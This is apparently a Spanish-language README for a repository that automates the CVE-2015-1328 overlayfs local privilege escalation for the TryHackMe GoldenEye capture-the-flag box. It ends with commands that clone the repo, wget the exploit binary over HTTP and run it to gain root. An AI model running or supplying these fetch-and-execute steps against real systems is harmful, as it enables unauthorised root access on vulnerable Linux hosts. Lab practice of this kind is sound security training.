
exploit de kernel
La implementación de overlayfs en el paquete linux (también conocido como kernel de Linux) anterior a 3.19.0-21.21 en Ubuntu hasta 15.04 no comprueba correctamente los permisos para la creación de archivos en el directorio superior del sistema de archivos, lo que permite a los usuarios locales obtener acceso root aprovechando una configuración en la que overlayfs está permitido en un espacio de nombres de montaje arbitrario.
Gracias a rebel
Este es un exploit automatizado para CVE-2015-1328 para el CTF GoldenEye de TryHackMe. Por defecto, gcc no está disponible en esa máquina, así que configuré gcc como cc y ejecuté el exploit en consecuencia para obtener privilegios de root.
Instalación
Simplemente, clona este repositorio:
$ git clone https://github.com/elit3pwner/CVE-2015-1328-GoldenEye.git
$ cd CVE-2015-1328-GoldenEye
$ chmod +x exploit.sh
$ bash exploit.sh
$ wget http://<target ip>:6969/exploit
$ chmod +x exploit
$ ./exploit